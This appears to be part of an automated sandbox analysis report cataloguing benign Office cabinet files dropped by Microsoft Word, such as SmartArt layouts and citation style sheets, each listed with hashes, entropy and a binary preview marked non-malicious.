                            SHA-512:2C3DFB0F8913D1D8FF95A55E1A1FD58CE1F9D034268CD7BC0D2BF2DCEFEA8EF05DD62B9AFDE1F983CACADD0529538381632ADFE7195EAC19CE4143414C44DBE3
                            Malicious:false
                            Preview:MSCF............D................................?..................................RadialPictureList.glox.................Content.inf....8....[.... $nq......C...../U..........a......S.Q...Q....j............(..z,.g.........^...Y..D... #i.TH5.<.=N..$..7.p".7.............`.3..1~,=,(.d8.Z.1....4'G.....!W^gClf._j.-N..&k.....Y3` =.(S..B^...i.zB.U....0O..h...I.(.......L...5.X.8.Sc<=>w.=.?&.....mR.......x.......mpW.T..^.FU...SN.C)......vsa.,x......,....E..i>..[g...#t...M..GR.9..$/4.:..q.bc9..x{bC.0..K.)..t.Y.&.v.d.16.B..c..or..W.,.B.........O.0..k.v........*F+..U.w...d...o8......A).}...#......L.!?.U.r.^.$...e.(..PG)8..+.9.5.l}.)..b.7+. 4....-.lC...|..j..Q.,.....7.W...|;j...%...:...|H..........<..%...K.....Fy.q$.k..}..8.9.M.u.?$].......r.....e.|..._..iT.;Dq5[....f.s..P.......e.T....!Y{.....t.wm..A..w-..7...3..T.:8.4.a[.Oo.. V.l.@.}..........E.&..J.....+..+.9)9<.._R.Hb.....V..Qu....:v.t.Li.0..J..V..b...!..N....-mD..c..(.[&o>.M.b..H.q..lk../..........W.8..z..B...
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                            Category:dropped
                            Size (bytes):19893
                            Entropy (8bit):7.592090622603185
                            Encrypted:false
                            SSDEEP:384:v3Zh3VlkpSIcgbA8E0GftpBjEmm3UFLrHRN7GYvlvQyUTL2mTAp:v31qp/A8Pi6mUqGGvU+mcp
                            MD5:EF9CB8BDFBC08F03BEF519AD66BA642F
                            SHA1:D98C275E9402462BF52A4D28FAF57DF0D232AF6B
                            SHA-256:93A2F873ACF5BEAD4BC0D1CC17B5E89A928D63619F70A1918B29E5230ABEAD8E
                            SHA-512:4DFBDF389730370FA142DCFB6F7E1AC1C0540B5320FA55F94164C0693DB06C21E6D4A1316F0ABE51E51BCBDAB3FD33AE882D9E3CFDB4385AB4C3AF4C2536B0B3
                            Malicious:false
                            Preview:MSCF............D................................?..................c...............TabbedArc.glox.....c...........Content.inf.;....Y.[.........B.....?.T..ZD...........^C...U.R<Z....z+.I.....Z..-.V...f.....lB..\P.....=.-p....w ...\.kD..x'v..T..A..............".8...d.........FD.ZL.h..T...bp.)9B.v..i..VX...&..\..7.s..qy...l........Rty.Y...rU..>.9...8....L..\.^x.kDU.|TJ..{kN.G..E..$.kvy?.. mv......P..4.....q.1.6<u....e..dD...4.1E..Xi.5.=....1.P.c.K~S...YMO:.?..cL.g.tq\.(b1....E..0A.i..C...BT.m.S......:...}.&U..#QL..O.O../..K......=..........0a..O............BYP......>f.......iu...7.K..;QO~.t....%N.s.]>~#../7YN.....C..9.=cY.......y..U5.....,.....u.....#_..SG.`NR*.....?*..d.R.k.rX$...&.... ..h.4T.D^k-xA...............Hz..ep)e..4..P."fo Ne...o.....0n.Exr.........H..v...A.."..%)2......5...".}j.o8...E.HRQ;}.. .._L.+.jz....{.U..}...=B.o.^..vZ.:5.Z.M....y{\(...N..9...EB*MG...!N.vy..^...nE..2..@.;.4..C..t.4....h..O.8.=.m./...|Lu.|mCU..b.^.n39.h[M...%D{..w.1
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                            Category:dropped
                            Size (bytes):35519
                            Entropy (8bit):7.846686335981972
                            Encrypted:false
                            SSDEEP:768:2LFougzHaUdBKUsM+Z56zBjA8Pi6bo+ld8IX:MFodzHaULR9P7bo+l6IX
                            MD5:53EE9DA49D0B84357038ECF376838D2E
                            SHA1:AB03F46783B2227F312187DD84DC0C517510DE20
                            SHA-256:9E46B8BA0BAD6E534AF33015C86396C33C5088D3AE5389217A5E90BA68252374
                            SHA-512:751300C76ECE4901801B1F9F51EACA7A758D5D4E6507E227558AAAAF8E547C3D59FA56153FEA96B6B2D7EB08C7AF2E4D5568ACE7E798D1A86CEDE363EFBECF7C
                            Malicious:false
                            Preview:MSCF.....K......L............................K...?...................J.......@..............turabian.xsl."...............Content.inf._.......[...T.....C4.5...E0B.]...+.-f....rc.[52.$...a..I....{z...`hx.r...!.. $...l..\....#3EF..r..c;<p...&n.\b..K..0Y..c+.2...i..B..wwY..77,...........}.q.C.......n..,.....prrx.QHy.B#..,.'....3....%1.``..hf...~...[.[n.v.s..y.vw....;..s.G293G&H....$E......m.&^..iy/.4.C...D...".(H&..&.I4._...!...... ........q.k1.d.....qc.3.c.....;.5.......y}...}&...+.WAN.,zVY.Q....V.Tz........g..H..c...E2jY...4g?.yf<....V.M.s.$..k.Id....+..?..._.\.s.k..9..I%;.yWQ..S..]..*.n<.7........=......"Q.*E.....MG..j.Yt..!U....Q.j...v.h-.~b..e&.......;...\.....:.....=..Xv1&q........6\...xw.%*.VdS..H...o...s.....+..%[../>.t..I....F.....".G|.....=....[..S..3..a.C.ZZ...tK.6N..b........)>........I..m..QE.M.nv.MVl.....vCG>,.suP.gqo.rr....J`m....J.b..},[F*....e.A.]..r....C4.?JJs6..l.].9...Q.B.~.......\d%.X ...8A....rH....&?#...^.....4.h.{>
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                            Category:dropped
                            Size (bytes):31471
                            Entropy (8bit):7.818389271364328
                            Encrypted:false
                            SSDEEP:768:eNtFWk68dbr2QxbM971RqpzAA8Pi6TlHaGRA5yr:eNtEkpGSbuHAkP7TlHaGq54
                            MD5:91AADBEC4171CFA8292B618492F5EF34
                            SHA1:A47DEB62A21056376DD8F862E1300F1E7DC69D1D
                            SHA-256:7E1A90CDB2BA7F03ABCB4687F0931858BF57E13552E0E4E54EC69A27325011EA
                            SHA-512:1978280C699F7F739CD9F6A81F2B665643BD0BE42CE815D22528F0D57C5A646FC30AAE517D4A0A374EFB8BD3C53EB9B3D129660503A82BA065679BBBB39BD8D5
                            Malicious:false
                            Preview:MSCF.....;......L............................;...?...................;......g...............sist02.xsl.................Content.inf....!....[...=.rF..3U.5...g.i?..w.oY..If'.......Y.;.B.....Wo.{T.TA.~......8......u.p....@Q..k.?.....G....j.|*.*J69H.2.ee..23s..;3..i..L.,...0se.%J........%.....!.....qB...SC...GAu5.P..u7....:.|.$Fo............{.......v.v.g..{o....e.....m.JeRG..,.%.1..Lh.@8.i.....l.#.HB`B....C......D@....?....P?..................|.9..q.......9.n.....F...s,....3..Q..N......y......_i..9|.<w...'q.Tq...U.E.B...q.?.4..O(_O.A.......*jC.~.21.7.....u.C...]uc.....-.g.{C~9q.q.1.1...4..=.0.Z.^....'../....-.6.K.....K...A#.GR..t.@.{.O.......Q5..=....X...^...F3.e.E.Z..b+R..?Z..0T1.....gQz.&....%y=zx.f.....6-*...u.Rm..x<...?...!g@.}..).J...:*...9.s&.v..}..'...\..Sd..F...........kQr.....h..3..1....B...B{M...%O.59.\.#....s/.pE.:}...k_.P.>.zj....5|.9+....$M..L........(...@#.....N.....N.*..........E..7..R$.:9!r>7.....v...>..S.w....9..]..n.w.;&.W..<r\S....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                            Category:dropped
                            Size (bytes):31083
                            Entropy (8bit):7.814202819173796
                            Encrypted:false
                            SSDEEP:384:0XbSq3W46TVZb5fOFo1HtZwGqtRT44hS+nyBoiuFgbA8E0GftpBjEcBFLrHRN7Ku:0XpOflfOFo1DMr/iuuA8Pi6cfKjW66b
                            MD5:89A9818E6658D73A73B642522FF8701F
                            SHA1:E66C95E957B74E90B444FF16D9B270ADAB12E0F4
                            SHA-256:F747DD8B79FC69217FA3E36FAE0AB417C1A0759C28C2C4F8B7450C70171228E6
                            SHA-512:321782B0B633380DA69BD7E98AA05BE7FA5D19A131294CC7C0A598A6A1A1AEF97AB1068427E4223AA30976E3C8246FF5C3C1265D4768FE9909B37F38CBC9E60D
                            Malicious:false
                            Preview:MSCF....[:......D...........................[:...?...................A..............CircleProcess.glox......A..........Content.inf......9.B[.....@*........!...(A.D..K.W.wwpwJj\.K\w...]...K.!.....@0..?,...}won`... ....&I..(;.....X.u..^.R..^......_:....W>f\....T...B..i`|q.....................i.5....(........0q7@.@..F...?A.`.....,L.......5.+../56..a`....1C5..9.*I.N.......@|<+./......... .ya....>l.,t.......y.y5...FF.,F..jCA...SA..H....8u.L..eM?.w8.......~^.Mr.[...(.._......u..+.......j..TJ.:<.3.X`...U.bz...[...r-...[...+..B.......}...\'.i...C.8.B_...c.8</..s.....VQ.Y..m.,.j~;y ...2.5.VQ...K..jP..2..r-...HA...."..9).7.....5.E._.wq.......!.+n+.f...s].4M'.1&...5....4..k..NV.M1.7`a..<.P4.|.mrd.i.R...u...............v.}..n\.C$.....[..2c.^..W..g..._.0.C.o....%.z.!.;.@y.`\..UO#i.)...Q...........L. .\:_..H.{.W...@...T.4..A.a...Wo?o$4.....#.V.s8M.Gh..p?A...Y.....)...........r|...!..o9...8..%#.[....;...3<Z...g....~.Z....,.(...qA.'x#..xC..@...HOuW.[.[....c.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                            Category:dropped
                            Size (bytes):21875
                            Entropy (8bit):7.6559132103953305
                            Encrypted:false
                            SSDEEP:384:k73HRpZA6B3ulrnxtRT7G8E0GftpBjEdHqlFLrHRN7uhFlvQyUTL2m4c:k7XRgIkrG8Pi6dmuNvU+mp
                            MD5:E532038762503FFA1371DF03FA2E222D
                            SHA1:F343B559AE21DAEF06CBCD8B2B3695DE1B1A46F0
                            SHA-256:5C70DD1551EB8B9B13EFAFEEAF70F08B307E110CAEE75AD9908A6A42BBCCB07E
                            SHA-512:E0712B481F1991256A01C3D02ED56645F61AA46EB5DE47E5D64D5ECD20052CDA0EE7D38208B5EE982971CCA59F2717B7CAE4DFCF235B779215E7613AA5DCD976
                            Malicious:false
                            Preview:MSCF....c.......D...........................c....?..................................ThemePictureAlternatingAccent.glox.................Content.inf...3.....[.... .qq...........\<.^......o."......f.o...x.{..q..^.MH^...........{0.K....4pX.i...@6A4X.P.01d....'p.......zA.......... .......7.......a. `.=!@- ......>G.s.k~@.a.lfha:m....1...@.,G`....{....W..N..qs.......j.+TrsT.l.9..L...1+...d..-u..-.......).#u&...3......k.&C...DdZ.'.......8..<PF..r.eq.X6...u..v...s5.m.Q.l.G%.<.]....RV<...S..Dv..s.r.......dh.N.3-.Hf'.....3.GZ..E.kt.5......h...|...?!.L....~.)..v....:2.../F.,....o.qi.i7..E.|.mh.R_.@A.FO@i.....Feo...x.l...{E.\W9|V...=#..3..(......tP.:i....Ox.U.N...%6...p.6&.....<zh.z.|.<Z.?.k....y7m...F.Z$-.:.l.h...{T..7....?..T...d,r...z?../...`/Z......a.v@)....u......V..v.:.._.|.'..[..O.s.OAt-."b.In"..I...J*.~H.:-...?..uV....dZ;z:.l.{.E.,.Q..i]:.0r.I.y..f...../j.wN...^R.....u....>..}....f.f...]A..C~;/....%..^#..N.a..........99.....`.....%..iS....S......$....)
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                            Category:dropped
                            Size (bytes):26944
                            Entropy (8bit):7.7574645319832225
                            Encrypted:false
                            SSDEEP:384:sbUX16g8/atF4NB3TJOvqeMRD/8svIZj/OwgbA8E0GftpBjEYwFLrHRN7mYll7PY:sbhg8yY4nMZK2hA8Pi6Yum4IVR
                            MD5:F913DD84915753042D856CEC4E5DABA5
                            SHA1:FB1E423C8D09388C3F0B6D44364D94D786E8CF53
                            SHA-256:AA03AFB681A76C86C1BD8902EE2BBA31A644841CE6BCB913C8B5032713265578
                            SHA-512:C48850522C809B18208403B3E721ABEB1187F954045CE2F8C48522368171CC8FAF5F30FA44F6762AFDE130EC72284BB2E74097A35FE61F056656A27F9413C6B6
                            Malicious:false
                            Preview:MSCF....0*......D...........................0*...?..................t,..............ConvergingText.glox.....t,..........Content.inf..C..)t-[.....@.........=...xxA. ...E^....x.x.^.......x..^^...DF.......s..d.P.....5.;..]...2.t.w.....O9.G..;.'.T....@I.,.q.u.3..P...9... ....`J.......g.(....).,.h0.....$.3..;.._.....~.de.jj.....U..K.0....`.@.H.1.x.Z.@..q....?....x.wW.....+am8A".....I..)..]...s..-z.2S+|.Cb.t6f],.n.LV......OVg....O.at|..-..x.....:....]s...u..g}.P..v.3....^.".%..%...#.2.....l00...n.......r8.p.....^.....n.)..,..t.^$b...b.q.W...F..R...n.-.+..'........Aw=._OwH....8.:s..{.#..{N.hW..`.._........Wy....>U.?....-.8tg...=..y..@.,.v|......l...t..l#{...H....9..|......~...De..#@y.&K....U...q.c.zK..D.<pV.....Ql..&Y...=#...w....r.`#2....Ug.J(..T...KmW.@...!....j:......M......!..E.7#s.t..F.aU..N....-.i......|w.lr..G.n.,.......=Kl.-m.?F.....v]?.......{q.U.t...<.|..u.....3R.`.t.T.>;v.....KQ...S...7..1...N.kN.y.)v.....3H:..D.{.+.(......u..^W&.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                            Category:dropped
                            Size (bytes):22594
                            Entropy (8bit):7.674816892242868
                            Encrypted:false
                            SSDEEP:384:L7d2l8FbHaaIKbtv1gDISi8E0GftpBjEZRFLrHRN74bUll7PK/pd:LUlCIOt/8Pi6Zv4bMId
                            MD5:EE0129C7CC1AC92BBC3D6CB0F653FCAE
                            SHA1:4ABAA858176B349BDAB826A7C5F9F00AC5499580
                            SHA-256:345AA5CA2496F975B7E33C182D5E57377F8B740F23E9A55F4B2B446723947B72
                            SHA-512:CDDABE701C8CBA5BD5D131ABB85F9241212967CE6924E34B9D78D6F43D76A8DE017E28302FF13CE800456AD6D1B5B8FFD8891A66E5BE0C1E74CF19DF9A7AD959
                            Malicious:false
                            Preview:MSCF....2.......D...........................2....?..................0...............ThemePictureAccent.glox.....0...........Content.inf.o.@D..8.[.........B.....?. $...K.....~....aZ.WA"...k.......Z......."......"..X.fpB 2@d..87.[.A......p..e.'......F..P^%.%.RK...........T%0..........9..+8 ...&.q.....+.......^.fad^^n...d.....s1..... .3j.c-c7..y<.....6........C5n.KG...Rs[lt..ZkwI.!..Uj.ez_!A^: /.;.Rl4....^..<6..N...'.YY.n*.E{.`..s.7..z.......L.y.Y.....q.kx.....[5.+<to......1...L.r.m..kC.q.k.1..o.w8s.....xh.@.b.`l\...}z1.6..Y.</DY...Z5..D...0..4.;..XAA..0qD..E.....h...C..hH......S..Z.\.VBu......Rxs.+:RKzD......{......a..=......).<.....d.SM.......c!t.4.h..A=J~.>q?Hw.^.....?.....[..`....v.nl..A.u...S!...............c......b.J.I.....D...._?}..or.g.JZ#*."_``.>.....{...w......s...R.iXR..'z....S.z.\..f.....>7m..0q.c-8\..nZw.q..J.l....+..V....ZTs{.[yh..~..c........9;..D...V.s...#...JX~t8%......cP^...!.t......?..'.(.kT.T.y.I ...:..Y3..[Up.m...%.~
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                            Category:dropped
                            Size (bytes):46413
                            Entropy (8bit):7.9071408623961394
                            Encrypted:false
                            SSDEEP:768:WaxA0CH65GY3+fvCXCttfR8JEBrkquwDn+QV5V+vNWBatX/xG8Pi65sMuMjvU+mQ:hne65GYOfKXMSEBrBtDnzFAI4JxP75sM
                            MD5:C455C4BC4BEC9E0DA67C4D1E53E46D5A
                            SHA1:7674600C387114B0F98EC925BE74E811FB25C325
                            SHA-256:40E9AF9284FF07FDB75C33A11A794F5333712BAA4A6CF82FA529FBAF5AD0FED0
                            SHA-512:08166F6CB3F140E4820F86918F59295CAD8B4A17240C206DCBA8B46088110BDF4E4ADBAB9F6380315AD4590CA7C8ECDC9AFAC6BD1935B17AFB411F325FE81720
                            Malicious:false
                            Preview:MSCF....=v......L...........................=v...?..................5u......................Text Sidebar (Annual Report Red and Black design).docx.v...............Content.inf..C,.zd..[............... .w.....b...wwww]r..W\ww...... .hh...........o.nz.....Ku.7..-.oH...h;.N..#.._.D,}......!Q$..Un.tI11..$w.r3... ..p...=.1....""..n...*/....h.A...Y..c,.Q.,......",..b.1.w..$.....l../;..J.....~.. ....+.R#....7.-..1.x.feH.@.......u...(.DQ%.wL.N|.xh...R..#....C...'X.m.....I{W.....5.C.....\....z.Y.)w..i...%....M..n.p.....{..-G9..k.bT.6........7....).....6..ys.....R.e.....0.Xk`.3..X\xL..4J"#.f...:....r..2..Y.uW..052.n.+ ..o..o..f&u.v.&9y.P..6.K..in.DU.#.~....4i..6;.5.w..i...g.(....../..0*Vh...C..//....W..:w......7.6....]....4.*9...sL.0k...zHh..2N.H...*..]..(.x.:..........Y.+...-.....&.*^..Q.sW...v..w.....k.L.e.^.W4iFS..u.....l.g'...b~:Zm...S.2.|......5S..=.............l.../|....G|.9 ..#.q...W.Q...G=.."W..'.6....I....D._.{.g.47....V.1._..<?....m............)..T.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                            Category:dropped
                            Size (bytes):34816
                            Entropy (8bit):7.840826397575377
                            Encrypted:false
                            SSDEEP:768:i3R9VYnIYfPYmqX0CnF1SRHVnLG8Pi61YbEIFO:ih9VjYfPYlk+F1SJxP71YbEIFO
                            MD5:62863124CDCDA135ECC0E722782CB888
                            SHA1:2543B8A9D3B2304BB73D2ADBEC60DB040B732055
                            SHA-256:23CCFB7206A8F77A13080998EC6EF95B59B3C3E12B72B2D2AD4E53B0B26BB8C3
                            SHA-512:2734D1119DC14B7DFB417F217867EF8CE8E73D69C332587278C0896B91247A40C289426A1A53F1796CCB42190001273D35525FCEA8BA2932A69A581972A1EF00
                            Malicious:false
                            Preview:MSCF.....H......L............................H...?...................G......................APASixthEditionOfficeOnline.xsl.H...............Content.inf..h;.....[...Q..\..3S.5..oVP!i/Z.Ls...]q$...xY..+W.qm..B..y/.5.s..x$../K./.x.$.....}.......\........LNf..Hd.&."Ip.L.Mr-@.D..kW~i...^.....F.....T.U....../..0..2.{.q.T.`'{.00.{.B...>.R..2....1.~_.f..s...........~....~[..v..w..v....$[K.r$#[6...d;[...#.9.-...G..Z..eAR.0")%JI?&....$..$.H..$(........f.> k....hP...p...!j.T......l7..../3..(2^V...#..T9...3.@[0...le:...........E....YP.\.....au1...\.S|..-.duN.Z..g.O......X8....1.....|,.f/..w.|Wk]zJz.g'./7h..+.....}............x....s.2Z\..W.{...O....W.{j.U..Q....uO=.p.M k.E.S{SUd.@....S.Syo8>......r......8..............Z?>.mUAg....?o....f.7..W.n...P..........d.S?...\..W`...c.ua..........#.Y...45...F(d.o\09^..[.}...BsT.SD..[l.8..uw.7l..S.9T.KR..o......V..]...M .....t.r...:P...M....4.F.....@..t.1t..S...k.2.|5...i.%H..<.J..*.0n.....lZ.....?.*?.~..O .)..
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                            Category:dropped
                            Size (bytes):31605
                            Entropy (8bit):7.820497014278096
                            Encrypted:false
                            SSDEEP:384:7SpOUxgQ9gFodHZktfHa2TSmcAg76j8/xorK0JoZgbA8E0GftpBjE2PzFLrHRN7S:OngHltf7Bcp/xoB3A8Pi625D8RA54
                            MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
                            SHA1:1AC85B369A976F35244BEEFA9C06787055C869C1
                            SHA-256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
                            SHA-512:BEA70229A21FBA3FD6D47A3DC5BECBA3EAA0335C08D486FAB808344BFAA2F7B24DD9A14A0F070E13A42BE45DE3FF54D32CF38B43192996D20DF4176964E81A53
                            Malicious:false
                            Preview:MSCF....e<......L...........................e<...?...................;......................gostname.xsl."...............Content.inf.[.......[...>..|..32.E..o`h....W.>.^...v..5...m.w.$.U..U......m.mu...'4....m`.9F.. ...I..PTS..O.D...GM#...#CUE.`.`%n..N...G,.~..+.6cv.L...G.m.Y..vy.....Yh9/.m,..wtw..;....Ka.a.{.\...'.....<X....%)...G..d......R./..4$..32..@....f.h....w..ov.}w..[.....{.v.......dr..&w#G..$3.zI&f..(C..L.z5J... .`...!.!4. ...!.` .$........w.J.X7.w_..@.w..f]=.C.....I-....s.s_.x...~..A... ...z...nM..;....Z....vt....6...~.w.....*x.g.h.T.J..-.3=....G.n..ti.A...s...j$.Bf..?......6.t.<j...>.."....&=BO?w.uN.o.t.-r..K....>C..^G..p...k...>.xZ.[fL..n.."].W#...|.i.0W.q.F: ..<#w......w....s....."...n.qu.../rI.....q....P~.B..|b?.N.}..MyO..q..:q.7..-~.xa.S...|.....X.....g.W.3.mo..yy.GG.s>....qy....r........#.F.P..A.......A....b.2..14.8.i6..w.S...v~{0z.<.Z...^!.;2mSV.i....{...U...+...r.;...h.++..T6.a...$....j5F+..1t....b......|.Q\d-.S..2... ......Y..A...s....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                            Category:dropped
                            Size (bytes):22340
                            Entropy (8bit):7.668619892503165
                            Encrypted:false
                            SSDEEP:384:GByvLdFHny7G8E0GftpBjE8upFLrHRN778lvQyUTL2mm2y:Oy3HkG8Pi6887mvU+ma
                            MD5:8B29FAB506FD65C21C9CD6FE6BBBC146
                            SHA1:CE1B8A57BB3C682F6A0AFC32955DAFD360720FDF
                            SHA-256:773AC516C9B9B28058128EC9BE099F817F3F90211AC70DC68077599929683D6F
                            SHA-512:AFA82CCBC0AEF9FAE4E728E4212E9C6EB2396D7330CCBE57F8979377D336B4DACF4F3BF835D04ABCEBCDB824B9A9147B4A7B5F12B8ADDADF42AB2C34A7450ADE
                            Malicious:false
                            Preview:MSCF....4.......D...........................4....?..................1...............ThemePictureGrid.glox.....1...........Content.inf....K..5.[.... V.q......B.....?.h.i.J.D...Z...>.....i~...A...Z....H.hy.D..X.....>...L.I..`. z w0}.K`.C{h....W\../.U..p\%...B...;............9..8.^M.....].lP.p...|..?..M....E..S.`..-n........Q'.'.o..C}=..?`.bQ...J"0f.. ....k3n..F.Pu..#...w].`<...."D.].-.#+):..fe..=<.M...4..s.q.f._.=.*T.M..U.[R.kbw.,......t6_I...~.X..$_.q....}2..BR...).[...<.l.3........h%....2.$`>..hG...0.6.S......._3.d~1.c.2g....7tTO..F.D.f.Y..WCG.B..T....Gg&.U'....u.S/......&6w..[bc.4....R.e..f.,....l."........I....J.=~...$x.&2...+,-.;.v.'.AQ.fc...v._..rZ..TYR...g?..Z..!.3mP dj...../...+...q.....>..../...]P.z?DW&.p..GZ....R5n......,..]{].0m.9...o.{...e."...8VH....w"%;.g\.K..p.}....#r.u..l.vS...Y.7U.N*-E@.....~....E...x.....C.......{NP....5Ymk.*._.K...Z...f..;.......b.....,._@B..\.S..d.'\rs..].}.5"XJU.J..'.zk}.+P.)C.X.?9sx.D....(K....P^N_D...Z.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                            Category:dropped
                            Size (bytes):21357
                            Entropy (8bit):7.641082043198371
                            Encrypted:false
                            SSDEEP:384:zdx+NRrogu6fzCI7Th7G8E0GftpBjEzZq4FLrHRN7/Oll7PK/pB:/+NRrFf/G8Pi6zZb/GIB
                            MD5:97F5B7B7E9E1281999468A5C42CB12E7
                            SHA1:99481B2FA609D1D80A9016ADAA3D37E7707A2ED1
                            SHA-256:1CF5C2D0F6188FFFF117932C424CC55D1459E0852564C09D7779263ABD116118
                            SHA-512:ACE9718D724B51FE04B900CE1D2075C0C05C80243EA68D4731A63138F3A1287776E80BD67ECB14C323C69AA1796E9D8774A3611FE835BA3CA891270DE1E7FD1F
                            Malicious:false
                            Preview:MSCF....].......D...........................]....?..........{.......................rings.glox.................Content.inf..|^.....[......P........<.$.."..0R..xa.Ax#B..d... ....K,.....^.H.....H.........&.j.\f.. ..,....,..!k..R..e..!...E...........................><.RB.....~h...........Q................g..M|,...x.....qV7.u..\...F-N.{-..X..&Zig.~..{.A.p.Z...X..{,-n............`$.%.ND.....>].6cvZ.%d..*a.$..-.K.Hf....L..;.#...H....U,........P.@.*-$C.,.g...%YJE..$.jP........b...Y<..[U...MF]F.K...1... x.}3w.o.#,.}T.....w5+...=.=...c.F^....OM.=.......G_{n.*...WC.w!......{/.~.}..s..6_......)..Xy...4.....<..XZJ........#~._i....%..fM.V.?.q...q.....7...B..sVt...(.:..c....~.e...kGZ...C..(J..o...`...?.)-.T.l....&...gR.$.....g.:...2.e%F.....x....z0...K..a8B...........D..]....7....~.".DR...r)...}b)e.>.\h~f...(}.c........Q...o5H.........C.KC.(.L.l................R..a.pg{..\.......-b........}.C......qTS..%..r.lG..Q.1..Z.>a.D...tC..LV...Rs.C.M18x.:......%O.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                            Category:dropped
                            Size (bytes):19288
                            Entropy (8bit):7.570850633867256
                            Encrypted:false
                            SSDEEP:384:5ZII4Hf+7G8E0GftpBjCwBFLrHRN7bcClvQyUTL2mH:pG8PicgbcAvU+mH
                            MD5:B9A6FF715719EE9DE16421AB983CA745
                            SHA1:6B3F68B224020CD4BF142D7EDAAEC6B471870358
                            SHA-256:E3BE3F1E341C0FA5E9CB79E2739CF0565C6EA6C189EA3E53ACF04320459A7070
                            SHA-512:062A765AC4602DB64D0504B79BE7380C14C143091A09F98A5E03E18747B2166BD862CE7EF55403D27B54CEB397D95BFAE3195C15D5516786FEBDAC6CD5FBF9CD
                            Malicious:false
                            Preview:MSCF....H.......D...........................H....?..................................VaryingWidthList.glox.................Content.inf...O.....[.... v.q......R.....>.%i.I.HhD.V...qt.....'....N...!..aw$(J.%(..A..h......l|.D.p9`..Y09.:.u....p. :,.*.YD=0.p. ......w.........*..<..;.....u.."......7[....8.....?^........-..;q.|.....B....PJ....r.K#.#.0'...}.........+gpR...T....5.iu.^I...A\..gK....}..z.B.nT.../.m.......N....E'1.E.\..o.....W..R.#.#...8.7...R.SbW-...%......$.obj.F..W_@....sY!........s.O..."k. ..b....j....v...P.\....7d...|"J.T...2p..m.&..r..,2.).....X.`...xt].U...b.h..V.....|L..N.Z.O#....o...1R.w30.g..?;..C.T.:$..MGY.C"i\.f..#..<.k...m..s.w. ..Ga].....wt.h|.Ta<.......(SO.]9.%a..Z... r._JH.=O...P.9a.v.....Kj.".T...m...4.?...F...$...y.....hbW.UA..u.&)....py.C{.=t.....n...}|H3A9.=..W..JJ..y./Y.E.M9..Z..w. .HB.YoIi..i.e..9;n...SpHw,....f....d>..g.m..z...... ...f...KP.M..U.....~vFD.fQ.P?......2!.n.....`@C!G...XI.].s,.X.'...u.E.o..f
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                            Category:dropped
                            Size (bytes):43653
                            Entropy (8bit):7.899157106666598
                            Encrypted:false
